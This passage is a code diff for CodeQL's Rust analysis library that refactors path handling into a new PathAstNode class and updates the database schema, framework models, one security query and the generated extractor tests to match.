codeql.rust.elements.internal.generated.Raw import codeql.rust.elements.internal.PatImpl::Impl as PatImpl -import codeql.rust.elements.Path -import codeql.rust.elements.internal.ResolvableImpl::Impl as ResolvableImpl +import codeql.rust.elements.internal.PathAstNodeImpl::Impl as PathAstNodeImpl /** * INTERNAL: This module contains the fully generated definition of `PathPat` and should not @@ -26,19 +25,7 @@ module Generated { * INTERNAL: Do not reference the `Generated::PathPat` class directly. * Use the subclass `PathPat`, where the following predicates are available. */ - class PathPat extends Synth::TPathPat, PatImpl::Pat, ResolvableImpl::Resolvable { + class PathPat extends Synth::TPathPat, PatImpl::Pat, PathAstNodeImpl::PathAstNode { override string getAPrimaryQlClass() { result = "PathPat" } - - /** - * Gets the path of this path pat, if it exists. - */ - Path getPath() { - result = Synth::convertPathFromRaw(Synth::convertPathPatToRaw(this).(Raw::PathPat).getPath()) - } - - /** - * Holds if `getPath()` exists. - */ - final predicate hasPath() { exists(this.getPath()) } } } diff --git a/rust/ql/lib/codeql/rust/elements/internal/generated/Raw.qll b/rust/ql/lib/codeql/rust/elements/internal/generated/Raw.qll index 368be81ad06..1a249fbcafa 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/generated/Raw.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/generated/Raw.qll @@ -803,7 +803,7 @@ module Raw { /** * INTERNAL: Do not use. - * Either a `PathExpr`, a `PathPat`, or a `MethodCallExpr`. + * One of `PathExpr`, `RecordExpr`, `PathPat`, `RecordPat`, `TupleStructPat` or `MethodCallExpr`. */ class Resolvable extends @resolvable, AstNode { /** @@ -2302,28 +2302,20 @@ module Raw { /** * INTERNAL: Do not use. - * A path expression or a variable access in a formatting template. See `PathExpr` and `FormatTemplateVariableAccess` for further details. + * An AST element wrapping a path (`PathExpr`, `RecordExpr`, `PathPat`, `RecordPat`, `TupleStructPat`). */ - class PathExprBase extends @path_expr_base, Expr, Resolvable { } + class PathAstNode extends @path_ast_node, Resolvable { + /** + * Gets the path of this path ast node, if it exists. + */ + Path getPath() { path_ast_node_paths(this, result) } + } /** * INTERNAL: Do not use. - * A path pattern. For example: - * ```rust - * match x { - * Foo::Bar => "ok", - * _ => "fail", - * } - * ``` + * A path expression or a variable access in a formatting template. See `PathExpr` and `FormatTemplateVariableAccess` for further details. */ - class PathPat extends @path_pat, Pat, Resolvable { - override string toString() { result = "PathPat" } - - /** - * Gets the path of this path pat, if it exists. - */ - Path getPath() { path_pat_paths(this, result) } - } + class PathExprBase extends @path_expr_base, Expr { } /** * INTERNAL: Do not use. @@ -2462,32 +2454,6 @@ module Raw { Pat getStart() { range_pat_starts(this, result) } } - /** - * INTERNAL: Do not use. - * A record expression. For example: - * ```rust - * let first = Foo { a: 1, b: 2 }; - * let second = Foo { a: 2, ..first }; - * Foo { a: 1, b: 2 }[2] = 10; - * Foo { .. } = second; - * ``` - */ - class RecordExpr extends @record_expr, Expr, Resolvable { - override string toString() { result = "RecordExpr" } - - /** - * Gets the path of this record expression, if it exists. - */ - Path getPath() { record_expr_paths(this, result) } - - /** - * Gets the record expression field list of this record expression, if it exists. - */ - RecordExprFieldList getRecordExprFieldList() { - record_expr_record_expr_field_lists(this, result) - } - } - /** * INTERNAL: Do not use. * A RecordFieldList. For example: @@ -2504,30 +2470,6 @@ module Raw { RecordField getField(int index) { record_field_list_fields(this, index, result) } } - /** - * INTERNAL: Do not use. - * A record pattern. For example: - * ```rust - * match x { - * Foo { a: 1, b: 2 } => "ok", - * Foo { .. } => "fail", - * } - * ``` - */ - class RecordPat extends @record_pat, Pat, Resolvable { - override string toString() { result = "RecordPat" } - - /** - * Gets the path of this record pat, if it exists. - */ - Path getPath() { record_pat_paths(this, result) } - - /** - * Gets the record pat field list of this record pat, if it exists. - */ - RecordPatFieldList getRecordPatFieldList() { record_pat_record_pat_field_lists(this, result) } - } - /** * INTERNAL: Do not use. * A reference expression. For example: @@ -2801,31 +2743,6 @@ module Raw { Pat getField(int index) { tuple_pat_fields(this, index, result) } } - /** - * INTERNAL: Do not use. - * A tuple struct pattern. For example: - * ```rust - * match x { - * Tuple("a", 1, 2, 3) => "great", - * Tuple(.., 3) => "fine", - * Tuple(..) => "fail", - * }; - * ``` - */ - class TupleStructPat extends @tuple_struct_pat, Pat, Resolvable { - override string toString() { result = "TupleStructPat" } - - /** - * Gets the `index`th field of this tuple struct pat (0-based). - */ - Pat getField(int index) { tuple_struct_pat_fields(this, index, result) } - - /** - * Gets the path of this tuple struct pat, if it exists. - */ - Path getPath() { tuple_struct_pat_paths(this, result) } - } - /** * INTERNAL: Do not use. * A TupleType. For example: @@ -3546,18 +3463,67 @@ module Raw { * let z = ::foo; * ``` */ - class PathExpr extends @path_expr, PathExprBase { + class PathExpr extends @path_expr, PathExprBase, PathAstNode { override string toString() { result = "PathExpr" } /** * Gets the `index`th attr of this path expression (0-based). */ Attr getAttr(int index) { path_expr_attrs(this, index, result) } + } + + /** + * INTERNAL: Do not use. + * A path pattern. For example: + * ```rust + * match x { + * Foo::Bar => "ok", + * _ => "fail", + * } + * ``` + */ + class PathPat extends @path_pat, Pat, PathAstNode { + override string toString() { result = "PathPat" } + } + + /** + * INTERNAL: Do not use. + * A record expression. For example: + * ```rust + * let first = Foo { a: 1, b: 2 }; + * let second = Foo { a: 2, ..first }; + * Foo { a: 1, b: 2 }[2] = 10; + * Foo { .. } = second; + * ``` + */ + class RecordExpr extends @record_expr, Expr, PathAstNode { + override string toString() { result = "RecordExpr" } /** - * Gets the path of this path expression, if it exists. + * Gets the record expression field list of this record expression, if it exists. */ - Path getPath() { path_expr_paths(this, result) } + RecordExprFieldList getRecordExprFieldList() { + record_expr_record_expr_field_lists(this, result) + } + } + + /** + * INTERNAL: Do not use. + * A record pattern. For example: + * ```rust + * match x { + * Foo { a: 1, b: 2 } => "ok", + * Foo { .. } => "fail", + * } + * ``` + */ + class RecordPat extends @record_pat, Pat, PathAstNode { + override string toString() { result = "RecordPat" } + + /** + * Gets the record pat field list of this record pat, if it exists. + */ + RecordPatFieldList getRecordPatFieldList() { record_pat_record_pat_field_lists(this, result) } } /** @@ -3750,6 +3716,26 @@ module Raw { WhereClause getWhereClause() { trait_alias_where_clauses(this, result) } } + /** + * INTERNAL: Do not use. + * A tuple struct pattern. For example: + * ```rust + * match x { + * Tuple("a", 1, 2, 3) => "great", + * Tuple(.., 3) => "fine", + * Tuple(..) => "fail", + * }; + * ``` + */ + class TupleStructPat extends @tuple_struct_pat, Pat, PathAstNode { + override string toString() { result = "TupleStructPat" } + + /** + * Gets the `index`th field of this tuple struct pat (0-based). + */ + Pat getField(int index) { tuple_struct_pat_fields(this, index, result) } + } + /** * INTERNAL: Do not use. * A TypeAlias. For example: diff --git a/rust/ql/lib/codeql/rust/elements/internal/generated/RecordExpr.qll b/rust/ql/lib/codeql/rust/elements/internal/generated/RecordExpr.qll index d7c6a11f21a..b6a0a2ecdd2 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/generated/RecordExpr.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/generated/RecordExpr.qll @@ -7,9 +7,8 @@ private import codeql.rust.elements.internal.generated.Synth private import codeql.rust.elements.internal.generated.Raw import codeql.rust.elements.internal.ExprImpl::Impl as ExprImpl -import codeql.rust.elements.Path +import codeql.rust.elements.internal.PathAstNodeImpl::Impl as PathAstNodeImpl import codeql.rust.elements.RecordExprFieldList -import codeql.rust.elements.internal.ResolvableImpl::Impl as ResolvableImpl /** * INTERNAL: This module contains the fully generated definition of `RecordExpr` and should not @@ -27,22 +26,9 @@ module Generated { * INTERNAL: Do not reference the `Generated::RecordExpr` class directly. * Use the subclass `RecordExpr`, where the following predicates are available. */ - class RecordExpr extends Synth::TRecordExpr, ExprImpl::Expr, ResolvableImpl::Resolvable { + class RecordExpr extends Synth::TRecordExpr, ExprImpl::Expr, PathAstNodeImpl::PathAstNode { override string getAPrimaryQlClass() { result = "RecordExpr" } - /** - * Gets the path of this record expression, if it exists. - */ - Path getPath() { - result = - Synth::convertPathFromRaw(Synth::convertRecordExprToRaw(this).(Raw::RecordExpr).getPath()) - } - - /** - * Holds if `getPath()` exists. - */ - final predicate hasPath() { exists(this.getPath()) } - /** * Gets the record expression field list of this record expression, if it exists. */ diff --git a/rust/ql/lib/codeql/rust/elements/internal/generated/RecordPat.qll b/rust/ql/lib/codeql/rust/elements/internal/generated/RecordPat.qll index 03f2c525180..5f0ad4f28ae 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/generated/RecordPat.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/generated/RecordPat.qll @@ -7,9 +7,8 @@ private import codeql.rust.elements.internal.generated.Synth private import codeql.rust.elements.internal.generated.Raw import codeql.rust.elements.internal.PatImpl::Impl as PatImpl -import codeql.rust.elements.Path +import codeql.rust.elements.internal.PathAstNodeImpl::Impl as PathAstNodeImpl import codeql.rust.elements.RecordPatFieldList -import codeql.rust.elements.internal.ResolvableImpl::Impl as ResolvableImpl /** * INTERNAL: This module contains the fully generated definition of `RecordPat` and should not @@ -27,22 +26,9 @@ module Generated { * INTERNAL: Do not reference the `Generated::RecordPat` class directly. * Use the subclass `RecordPat`, where the following predicates are available. */ - class RecordPat extends Synth::TRecordPat, PatImpl::Pat, ResolvableImpl::Resolvable { + class RecordPat extends Synth::TRecordPat, PatImpl::Pat, PathAstNodeImpl::PathAstNode { override string getAPrimaryQlClass() { result = "RecordPat" } - /** - * Gets the path of this record pat, if it exists. - */ - Path getPath() { - result = - Synth::convertPathFromRaw(Synth::convertRecordPatToRaw(this).(Raw::RecordPat).getPath()) - } - - /** - * Holds if `getPath()` exists. - */ - final predicate hasPath() { exists(this.getPath()) } - /** * Gets the record pat field list of this record pat, if it exists. */ diff --git a/rust/ql/lib/codeql/rust/elements/internal/generated/Resolvable.qll b/rust/ql/lib/codeql/rust/elements/internal/generated/Resolvable.qll index ecd1e7db50a..fb0d7975cf9 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/generated/Resolvable.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/generated/Resolvable.qll @@ -14,7 +14,7 @@ import codeql.rust.elements.internal.AstNodeImpl::Impl as AstNodeImpl */ module Generated { /** - * Either a `PathExpr`, a `PathPat`, or a `MethodCallExpr`. + * One of `PathExpr`, `RecordExpr`, `PathPat`, `RecordPat`, `TupleStructPat` or `MethodCallExpr`. * INTERNAL: Do not reference the `Generated::Resolvable` class directly. * Use the subclass `Resolvable`, where the following predicates are available. */ diff --git a/rust/ql/lib/codeql/rust/elements/internal/generated/Synth.qll b/rust/ql/lib/codeql/rust/elements/internal/generated/Synth.qll index 8a236d3f322..affdd5a61b1 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/generated/Synth.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/generated/Synth.qll @@ -713,6 +713,11 @@ module Synth { TPathPat or TRangePat or TRecordPat or TRefPat or TRestPat or TSlicePat or TTuplePat or TTupleStructPat or TWildcardPat; + /** + * INTERNAL: Do not use. + */ + class TPathAstNode = TPathExpr or TPathPat or TRecordExpr or TRecordPat or TTupleStructPat; + /** * INTERNAL: Do not use. */ @@ -721,8 +726,7 @@ module Synth { /** * INTERNAL: Do not use. */ - class TResolvable = - TMethodCallExpr or TPathExprBase or TPathPat or TRecordExpr or TRecordPat or TTupleStructPat; + class TResolvable = TMethodCallExpr or TPathAstNode; /** * INTERNAL: Do not use. @@ -2053,6 +2057,22 @@ module Synth { result = convertWildcardPatFromRaw(e) } + /** + * INTERNAL: Do not use. + * Converts a raw DB element to a synthesized `TPathAstNode`, if possible. + */ + TPathAstNode convertPathAstNodeFromRaw(Raw::Element e) { + result = convertPathExprFromRaw(e) + or + result = convertPathPatFromRaw(e) + or + result = convertRecordExprFromRaw(e) + or + result = convertRecordPatFromRaw(e) + or + result = convertTupleStructPatFromRaw(e) + } + /** * INTERNAL: Do not use. * Converts a raw DB element to a synthesized `TPathExprBase`, if possible. @@ -2070,15 +2090,7 @@ module Synth { TResolvable convertResolvableFromRaw(Raw::Element e) { result = convertMethodCallExprFromRaw(e) or - result = convertPathExprBaseFromRaw(e) - or - result = convertPathPatFromRaw(e) - or - result = convertRecordExprFromRaw(e) - or - result = convertRecordPatFromRaw(e) - or - result = convertTupleStructPatFromRaw(e) + result = convertPathAstNodeFromRaw(e) } /** @@ -3447,6 +3459,22 @@ module Synth { result = convertWildcardPatToRaw(e) } + /** + * INTERNAL: Do not use. + * Converts a synthesized `TPathAstNode` to a raw DB element, if possible. + */ + Raw::Element convertPathAstNodeToRaw(TPathAstNode e) { + result = convertPathExprToRaw(e) + or + result = convertPathPatToRaw(e) + or + result = convertRecordExprToRaw(e) + or + result = convertRecordPatToRaw(e) + or + result = convertTupleStructPatToRaw(e) + } + /** * INTERNAL: Do not use. * Converts a synthesized `TPathExprBase` to a raw DB element, if possible. @@ -3464,15 +3492,7 @@ module Synth { Raw::Element convertResolvableToRaw(TResolvable e) { result = convertMethodCallExprToRaw(e) or - result = convertPathExprBaseToRaw(e) - or - result = convertPathPatToRaw(e) - or - result = convertRecordExprToRaw(e) - or - result = convertRecordPatToRaw(e) - or - result = convertTupleStructPatToRaw(e) + result = convertPathAstNodeToRaw(e) } /** diff --git a/rust/ql/lib/codeql/rust/elements/internal/generated/TupleStructPat.qll b/rust/ql/lib/codeql/rust/elements/internal/generated/TupleStructPat.qll index 9e57c0a9ad8..5945467cd1c 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/generated/TupleStructPat.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/generated/TupleStructPat.qll @@ -8,8 +8,7 @@ private import codeql.rust.elements.internal.generated.Synth private import codeql.rust.elements.internal.generated.Raw import codeql.rust.elements.Pat import codeql.rust.elements.internal.PatImpl::Impl as PatImpl -import codeql.rust.elements.Path -import codeql.rust.elements.internal.ResolvableImpl::Impl as ResolvableImpl +import codeql.rust.elements.internal.PathAstNodeImpl::Impl as PathAstNodeImpl /** * INTERNAL: This module contains the fully generated definition of `TupleStructPat` and should not @@ -28,7 +27,7 @@ module Generated { * INTERNAL: Do not reference the `Generated::TupleStructPat` class directly. * Use the subclass `TupleStructPat`, where the following predicates are available. */ - class TupleStructPat extends Synth::TTupleStructPat, PatImpl::Pat, ResolvableImpl::Resolvable { + class TupleStructPat extends Synth::TTupleStructPat, PatImpl::Pat, PathAstNodeImpl::PathAstNode { override string getAPrimaryQlClass() { result = "TupleStructPat" } /** @@ -50,20 +49,5 @@ module Generated { * Gets the number of fields of this tuple struct pat. */ final int getNumberOfFields() { result = count(int i | exists(this.getField(i))) } - - /** - * Gets the path of this tuple struct pat, if it exists. - */ - Path getPath() { - result = - Synth::convertPathFromRaw(Synth::convertTupleStructPatToRaw(this) - .(Raw::TupleStructPat) - .getPath()) - } - - /** - * Holds if `getPath()` exists. - */ - final predicate hasPath() { exists(this.getPath()) } } } diff --git a/rust/ql/lib/codeql/rust/frameworks/Reqwest.qll b/rust/ql/lib/codeql/rust/frameworks/Reqwest.qll index f46c12feab9..2d3e04f94b3 100644 --- a/rust/ql/lib/codeql/rust/frameworks/Reqwest.qll +++ b/rust/ql/lib/codeql/rust/frameworks/Reqwest.qll @@ -12,9 +12,8 @@ private class ReqwestGet extends RemoteSource::Range { ReqwestGet() { exists(CallExpr ce | this.asExpr().getExpr() = ce and - ce.getFunction().(PathExpr).getPath().getResolvedCrateOrigin().matches("%reqwest") and - ce.getFunction().(PathExpr).getPath().getResolvedPath() = - ["crate::get", "crate::blocking::get"] + ce.getFunction().(PathExpr).getResolvedCrateOrigin().matches("%reqwest") and + ce.getFunction().(PathExpr).getResolvedPath() = ["crate::get", "crate::blocking::get"] ) } } diff --git a/rust/ql/lib/codeql/rust/frameworks/stdlib/Env.qll b/rust/ql/lib/codeql/rust/frameworks/stdlib/Env.qll index 3e769ae84d4..8410da77a06 100644 --- a/rust/ql/lib/codeql/rust/frameworks/stdlib/Env.qll +++ b/rust/ql/lib/codeql/rust/frameworks/stdlib/Env.qll @@ -10,7 +10,7 @@ private import codeql.rust.Concepts */ private class StdEnvArgs extends CommandLineArgsSource::Range { StdEnvArgs() { - this.asExpr().getExpr().(CallExpr).getFunction().(PathExpr).getPath().getResolvedPath() = + this.asExpr().getExpr().(CallExpr).getFunction().(PathExpr).getResolvedPath() = ["crate::env::args", "crate::env::args_os"] } } @@ -20,7 +20,7 @@ private class StdEnvArgs extends CommandLineArgsSource::Range { */ private class StdEnvDir extends CommandLineArgsSource::Range { StdEnvDir() { - this.asExpr().getExpr().(CallExpr).getFunction().(PathExpr).getPath().getResolvedPath() = + this.asExpr().getExpr().(CallExpr).getFunction().(PathExpr).getResolvedPath() = ["crate::env::current_dir", "crate::env::current_exe", "crate::env::home_dir"] } } @@ -30,7 +30,7 @@ private class StdEnvDir extends CommandLineArgsSource::Range { */ private class StdEnvVar extends EnvironmentSource::Range { StdEnvVar() { - this.asExpr().getExpr().(CallExpr).getFunction().(PathExpr).getPath().getResolvedPath() = + this.asExpr().getExpr().(CallExpr).getFunction().(PathExpr).getResolvedPath() = ["crate::env::var", "crate::env::var_os", "crate::env::vars", "crate::env::vars_os"] } } diff --git a/rust/ql/lib/rust.dbscheme b/rust/ql/lib/rust.dbscheme index d63c6d62298..801789b2d99 100644 --- a/rust/ql/lib/rust.dbscheme +++ b/rust/ql/lib/rust.dbscheme @@ -843,11 +843,7 @@ rename_names( @resolvable = @method_call_expr -| @path_expr_base -| @path_pat -| @record_expr -| @record_pat -| @tuple_struct_pat +| @path_ast_node ; #keyset[id] @@ -1984,20 +1980,24 @@ paren_type_ties( int ty: @type_ref ref ); +@path_ast_node = + @path_expr +| @path_pat +| @record_expr +| @record_pat +| @tuple_struct_pat +; + +#keyset[id] +path_ast_node_paths( + int id: @path_ast_node ref, + int path: @path ref +); + @path_expr_base = @path_expr ; -path_pats( - unique int id: @path_pat -); - -#keyset[id] -path_pat_paths( - int id: @path_pat ref, - int path: @path ref -); - path_types( unique int id: @path_type ); @@ -2102,22 +2102,6 @@ range_pat_starts( int start: @pat ref ); -record_exprs( - unique int id: @record_expr -); - -#keyset[id] -record_expr_paths( - int id: @record_expr ref, - int path: @path ref -); - -#keyset[id] -record_expr_record_expr_field_lists( - int id: @record_expr ref, - int record_expr_field_list: @record_expr_field_list ref -); - record_field_lists( unique int id: @record_field_list ); @@ -2129,22 +2113,6 @@ record_field_list_fields( int field: @record_field ref ); -record_pats( - unique int id: @record_pat -); - -#keyset[id] -record_pat_paths( - int id: @record_pat ref, - int path: @path ref -); - -#keyset[id] -record_pat_record_pat_field_lists( - int id: @record_pat ref, - int record_pat_field_list: @record_pat_field_list ref -); - ref_exprs( unique int id: @ref_expr ); @@ -2340,23 +2308,6 @@ tuple_pat_fields( int field: @pat ref ); -tuple_struct_pats( - unique int id: @tuple_struct_pat -); - -#keyset[id, index] -tuple_struct_pat_fields( - int id: @tuple_struct_pat ref, - int index: int ref, - int field: @pat ref -); - -#keyset[id] -tuple_struct_pat_paths( - int id: @tuple_struct_pat ref, - int path: @path ref -); - tuple_types( unique int id: @tuple_type ); @@ -2991,10 +2942,28 @@ path_expr_attrs( int attr: @attr ref ); +path_pats( + unique int id: @path_pat +); + +record_exprs( + unique int id: @record_expr +); + #keyset[id] -path_expr_paths( - int id: @path_expr ref, - int path: @path ref +record_expr_record_expr_field_lists( + int id: @record_expr ref, + int record_expr_field_list: @record_expr_field_list ref +); + +record_pats( + unique int id: @record_pat +); + +#keyset[id] +record_pat_record_pat_field_lists( + int id: @record_pat ref, + int record_pat_field_list: @record_pat_field_list ref ); statics( @@ -3181,6 +3150,17 @@ trait_alias_where_clauses( int where_clause: @where_clause ref ); +tuple_struct_pats( + unique int id: @tuple_struct_pat +); + +#keyset[id, index] +tuple_struct_pat_fields( + int id: @tuple_struct_pat ref, + int index: int ref, + int field: @pat ref +); + type_aliases( unique int id: @type_alias ); diff --git a/rust/ql/src/queries/security/CWE-696/BadCtorInitialization.ql b/rust/ql/src/queries/security/CWE-696/BadCtorInitialization.ql index 22ea6514e02..a8607569974 100644 --- a/rust/ql/src/queries/security/CWE-696/BadCtorInitialization.ql +++ b/rust/ql/src/queries/security/CWE-696/BadCtorInitialization.ql @@ -32,7 +32,7 @@ class CtorAttr extends Attr { */ class StdCall extends Expr { StdCall() { - this.(CallExpr).getFunction().(PathExpr).getPath().getResolvedCrateOrigin() = "lang:std" or + this.(CallExpr).getFunction().(PathExpr).getResolvedCrateOrigin() = "lang:std" or this.(MethodCallExpr).getResolvedCrateOrigin() = "lang:std" } } diff --git a/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess.expected b/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess.expected index 4f9a487e85d..df4fdad5c91 100644 --- a/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess.expected +++ b/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess.expected @@ -1,5 +1,5 @@ -| gen_format_args_expr.rs:9:20:9:20 | x | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | -| gen_format_args_expr.rs:9:25:9:25 | y | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | -| gen_format_argument.rs:5:22:5:26 | value | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | -| gen_format_argument.rs:5:29:5:33 | width | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | -| gen_format_argument.rs:5:36:5:44 | precision | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | +| gen_format_args_expr.rs:9:20:9:20 | x | +| gen_format_args_expr.rs:9:25:9:25 | y | +| gen_format_argument.rs:5:22:5:26 | value | +| gen_format_argument.rs:5:29:5:33 | width | +| gen_format_argument.rs:5:36:5:44 | precision | diff --git a/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess.ql b/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess.ql index 488207bc5bb..4f43ca11870 100644 --- a/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess.ql +++ b/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess.ql @@ -2,12 +2,6 @@ import codeql.rust.elements import TestUtils -from FormatTemplateVariableAccess x, string hasResolvedPath, string hasResolvedCrateOrigin -where - toBeTested(x) and - not x.isUnknown() and - (if x.hasResolvedPath() then hasResolvedPath = "yes" else hasResolvedPath = "no") and - if x.hasResolvedCrateOrigin() - then hasResolvedCrateOrigin = "yes" - else hasResolvedCrateOrigin = "no" -select x, "hasResolvedPath:", hasResolvedPath, "hasResolvedCrateOrigin:", hasResolvedCrateOrigin +from FormatTemplateVariableAccess x +where toBeTested(x) and not x.isUnknown() +select x diff --git a/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedCrateOrigin.expected b/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedCrateOrigin.expected deleted file mode 100644 index e69de29bb2d..00000000000 diff --git a/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedCrateOrigin.ql b/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedCrateOrigin.ql deleted file mode 100644 index 8022e46e327..00000000000 --- a/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedCrateOrigin.ql +++ /dev/null @@ -1,7 +0,0 @@ -// generated by codegen, do not edit -import codeql.rust.elements -import TestUtils - -from FormatTemplateVariableAccess x -where toBeTested(x) and not x.isUnknown() -select x, x.getResolvedCrateOrigin() diff --git a/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedPath.expected b/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedPath.expected deleted file mode 100644 index e69de29bb2d..00000000000 diff --git a/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedPath.ql b/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedPath.ql deleted file mode 100644 index 916fb7da09b..00000000000 --- a/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedPath.ql +++ /dev/null @@ -1,7 +0,0 @@ -// generated by codegen, do not edit -import codeql.rust.elements -import TestUtils - -from FormatTemplateVariableAccess x -where toBeTested(x) and not x.isUnknown() -select x, x.getResolvedPath() diff --git a/rust/ql/test/extractor-tests/generated/Path/PathExpr.expected b/rust/ql/test/extractor-tests/generated/Path/PathExpr.expected index 540ad015ddb..b9032fb4384 100644 --- a/rust/ql/test/extractor-tests/generated/Path/PathExpr.expected +++ b/rust/ql/test/extractor-tests/generated/Path/PathExpr.expected @@ -1,6 +1,6 @@ -| gen_path.rs:6:5:6:12 | ...::bar | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | getNumberOfAttrs: | 0 | hasPath: | yes | -| gen_path_expr.rs:5:13:5:20 | variable | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | getNumberOfAttrs: | 0 | hasPath: | yes | -| gen_path_expr.rs:6:13:6:20 | ...::bar | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | getNumberOfAttrs: | 0 | hasPath: | yes | -| gen_path_expr.rs:7:13:7:20 | ...::foo | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | getNumberOfAttrs: | 0 | hasPath: | yes | -| gen_path_expr.rs:8:13:8:35 | ...::foo | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | getNumberOfAttrs: | 0 | hasPath: | yes | -| gen_path_pat.rs:5:11:5:11 | x | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | getNumberOfAttrs: | 0 | hasPath: | yes | +| gen_path.rs:6:5:6:12 | ...::bar | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasPath: | yes | getNumberOfAttrs: | 0 | +| gen_path_expr.rs:5:13:5:20 | variable | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasPath: | yes | getNumberOfAttrs: | 0 | +| gen_path_expr.rs:6:13:6:20 | ...::bar | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasPath: | yes | getNumberOfAttrs: | 0 | +| gen_path_expr.rs:7:13:7:20 | ...::foo | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasPath: | yes | getNumberOfAttrs: | 0 | +| gen_path_expr.rs:8:13:8:35 | ...::foo | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasPath: | yes | getNumberOfAttrs: | 0 | +| gen_path_pat.rs:5:11:5:11 | x | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasPath: | yes | getNumberOfAttrs: | 0 | diff --git a/rust/ql/test/extractor-tests/generated/Path/PathExpr.ql b/rust/ql/test/extractor-tests/generated/Path/PathExpr.ql index 62db075a1ac..41b7414d24c 100644 --- a/rust/ql/test/extractor-tests/generated/Path/PathExpr.ql +++ b/rust/ql/test/extractor-tests/generated/Path/PathExpr.ql @@ -3,8 +3,8 @@ import codeql.rust.elements import TestUtils from - PathExpr x, string hasResolvedPath, string hasResolvedCrateOrigin, int getNumberOfAttrs, - string hasPath + PathExpr x, string hasResolvedPath, string hasResolvedCrateOrigin, string hasPath, + int getNumberOfAttrs where toBeTested(x) and not x.isUnknown() and @@ -14,7 +14,7 @@ where then hasResolvedCrateOrigin = "yes" else hasResolvedCrateOrigin = "no" ) and - getNumberOfAttrs = x.getNumberOfAttrs() and - if x.hasPath() then hasPath = "yes" else hasPath = "no" + (if x.hasPath() then hasPath = "yes" else hasPath = "no") and + getNumberOfAttrs = x.getNumberOfAttrs() select x, "hasResolvedPath:", hasResolvedPath, "hasResolvedCrateOrigin:", hasResolvedCrateOrigin, - "getNumberOfAttrs:", getNumberOfAttrs, "hasPath:", hasPath + "hasPath:", hasPath, "getNumberOfAttrs:", getNumberOfAttrs diff --git a/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat.expected b/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat.expected index 9fa41161bcb..9e9de534b1e 100644 --- a/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat.expected +++ b/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat.expected @@ -1,3 +1,3 @@ -| gen_tuple_struct_pat.rs:6:9:6:27 | Tuple(...) | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | getNumberOfFields: | 4 | hasPath: | yes | -| gen_tuple_struct_pat.rs:7:9:7:20 | Tuple(...) | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | getNumberOfFields: | 2 | hasPath: | yes | -| gen_tuple_struct_pat.rs:8:9:8:17 | Tuple(...) | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | getNumberOfFields: | 1 | hasPath: | yes | +| gen_tuple_struct_pat.rs:6:9:6:27 | Tuple(...) | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasPath: | yes | getNumberOfFields: | 4 | +| gen_tuple_struct_pat.rs:7:9:7:20 | Tuple(...) | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasPath: | yes | getNumberOfFields: | 2 | +| gen_tuple_struct_pat.rs:8:9:8:17 | Tuple(...) | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasPath: | yes | getNumberOfFields: | 1 | diff --git a/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat.ql b/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat.ql index 14ba21627af..af59101fe75 100644 --- a/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat.ql +++ 